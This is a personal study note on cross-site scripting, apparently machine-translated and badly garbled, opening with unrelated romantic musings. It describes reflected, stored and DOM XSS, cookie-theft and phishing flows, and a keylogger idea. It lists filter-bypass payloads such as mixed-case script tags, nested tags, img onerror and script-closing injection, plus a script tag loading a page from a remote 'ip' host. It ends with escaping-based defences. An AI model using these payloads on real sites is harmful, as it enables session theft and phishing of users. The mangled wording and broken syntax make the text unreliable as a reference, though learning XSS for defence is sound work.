I need love in my heart, others just made me remember the share already exist in the heart of love, to love a person like a tank containing water, the water extent that you love yourself, my love are you with me because I look like you, that you put me aroused you make me better, but only if I love myself
The truth is not important, the result is what is most important. Sibu Si is none other than the final say, would be willing to look at yourself. ----- Grand Shanghai 2012
Cross-site scripting vulnerability Overview:
Cross-site scripting vulnerability types and testing process:
1. Find the entry point at the target site, such as query interface, message boards;
2, enter a special character + uniquely identifying characters, click submit, have returned to see the source, if there is a corresponding process made; submitted to see whether the data is or has been filtered out;
3, by searching to locate the unique characters, unique characters before and after the binding syntax can be configured to confirm whether the conditional execution js (closed configuration)
4, to submit a structural script code (as well as various bypass posture), see if you can execute successfully, if successfully executed then there is XSS vulnerabilities;
TIPS:
1. General Query Interface prone reflective XSS, prone Message storage type XSS
2. Background Because there may be filtering measures, construction js might be filtered out, and could not be effective, or limit the execution environment (browser);
3. Adoption of changes in different script attempts to bypass the background filtering mechanism;
Principle reflective XSS (get & post) analysis:
From the reflection type of XSS (get) pop began to realize that xss vulnerabilities; If the form limits the length, the length can sometimes get rid of the F12 view the elements; get the XSS exploit them is relatively easy.
Storage-type XSS principle analysis:
Xss is a storage type will be saved to the database, and is stored in the database without reflection type; hazard will exist to a greater because the database or the configuration file;
Dom type XSS principle analysis:
XSS pure front end operation, will be acquired in the form of a character input; XSS-S and a character input that is acquired in the url;
XSS hazard - Get cookie principles
get, post ;; how to obtain the cookie, the attacker to build a platform for mobile phones xss cookie;
GET type XSS exploit: Get cookie, GET type parameters are inside the URL
1. The user accesses the page XSS, trigger scripts, the server returns a page with malicious JS
2. The user executing the script, cookie stealing data sent back to the attacker,
3. attackers fake user logs in, causing damage
POST-type XSS exploit:
1.Requset fake page, triggering Form
2. JS page POST form data automatically trigger XSS
3. Perform after JS, steal cookie ;;; when users access our form equal to the attack is complete, access the form because the form has malicious code, malicious code is docment.cookie so get the user's cookie; this form to help the user requests a request this form is the existence of XSS vulnerability of the page to be submitted in a js malicious code, this malicious code is to get xss back local cookie is sent to my attacker;; this loophole post is to set up a form page own automatic submission page; allowing users to access;
XSS hazard -XSS be fishing principles
Jis src write access with a background of a page xss page will pop up that you need to be logged in to view, then we redirect this link in another code just to save user and password;
<script src="http://ip/xxx/xxx/xxx/xxx.html"></script>
XSS hazard -XSS get keyloggers principle
Cross-domain case different port subdomain agreements are cross-domain ;;
Cross-domain - origin policy: For security reasons, all browsers have agreed on the same-origin policy, the provisions of the same origin policy, you can not use JS to interoperate between two different domains; for example: JS under the x.com domain does not y.com domain in the operation target;
If you want to cross-domain, you need administrator special configuration;
Tips: The following labels load cross-domain resource is not the same origin policy restrictions.
<Script src = ""> // JS, loaded into XIP
<Img src = ""> // Pictures
<link href=""> // css
<Iframe src = ""> // any resource
If there is no same-origin policy attacker sends a malicious link to A urlb:. Www steal your cookie.com (this malicious link embedded in a lot of JS code) This code can be directly Taobao steal your cookie this way, then also different xss Unlike other vulnerabilities, so long as the child made a JS code that malicious code can be read cookie, this way, then the front end of chaos, so that all browsers have the same origin policy;
event.keyCode method is used to retrieve the user may then invoke an asynchronous keyboard POST request to the background
ajxs default is probably not across domains ;; ------------
header ( "Access-Control-Allow-Origin: *"); the addition of such a thing on it ;;
XSS comfortably principle:
Comfortably say is a major scene; if not comfortably in front of the display, enter the backstage preserved and executed in the background; if we enter a malicious code gets the cookie, when the background administrator login will get its cookie;
XSS filtering and bypass
XSS output in case hrep and js Analysis
XSS common precautions
Baidu OWASP has some relevant learning things ;;;
XSS is a place of vulnerability in the Web front-end, so the object of the harm is mainly front-end user.
XSS vulnerabilities can be used for phishing attacks, the front js mining, the user cookie acquisition, combined with the browser itself may even vulnerability to users remote control;
XSS attacks probably Process: Slightly
Cross-site scripting vulnerability common types: Hazard: storage type> reflective> DOM type
Reflection type: interactive data are generally not present in a database, disposable, WYSIWYG, generally appear in the query page type and the like;
Storage type: interactive data will have to be exist in a database, persistent storage, usually appears in the message boards, registration page;
DOM Type: exchanging data with no back-end server, a DOM operations generated when the front-end code output obtained have problems, also a reflection type one-time by;
XSS vulnerability was mainly due to the program input and output control was not stringent enough, resulting in the well-constructed script input, output when the front end is as valid browser parses the code execution resulting harm;
XSS bypass - filter - Conversion
1. The front end of limiting bypass, direct capture reproduction, or Edit HTML front-end code;
2. The case, such as: <SCRIPT> aLeRT (111) </ sCRIpt>
3.拼凑:<scri<script>pt>alert(111)<scri<script>pt>
4. Note interference: <scri <- test -> pt!> Alert (111) </ sc <- test -> ript!>
XSS bypass - filter - encoding
Background filtered special characters, such as the <script> tag, when the tag may be a variety of coding, the background filter will not necessarily, when the browser recognizes the coding, will translate into a normal tag, thereby performing;
Note that when encoding using the encoding and whether it will be recognized properly translate the output point ;;
alert ( 'xss') URL encoding can be implemented?
alert% 28% 27xss% 27% 29 does not perform, since these attributes does not resolve these codes and labels normal ;;
But it can be HTML coding on it
There are many methods to bypass XSS, depending on the ideas and mastery of front-end technology ;;
<ScRipT>alert(111)</ScRipT>
<img src= x onerror="alert(aaa)">
XSS is quite flexible, mainly to see themselves enough flair;
XSS --- htmlspecialchars is a php function to the default "filter does not 'guolv
XSS common precautions: do filter input and output as an escape;
For example, enter the phone number :: filter, then only allowed to enter numbers phone format
Escape: all output to the data output of the front end according to the point to be escaped, such as the output is performed to html html entity escape, proceeds JS JS inputted to escape;
XSS of hrep: a label href: javascript: alert (111) there may output; href do output, usually href hyperlinks do so at the time only allowed http https allowed to enter here output;
XSS of JS: how to construct closed in front of the variable closed off
<script>
$dd='x' </script> <script>alert(‘xss’)</script>
Was added in the middle of a </ script> in front of the closure to <script>
If the HTML entity encoding, although XSS solve the problem, but the entity coding, JS which will not be translated, so it should be used in the output point of JS \ to escape special characters;
The study used; written mess; feel that they are a bit difficult to understand look back;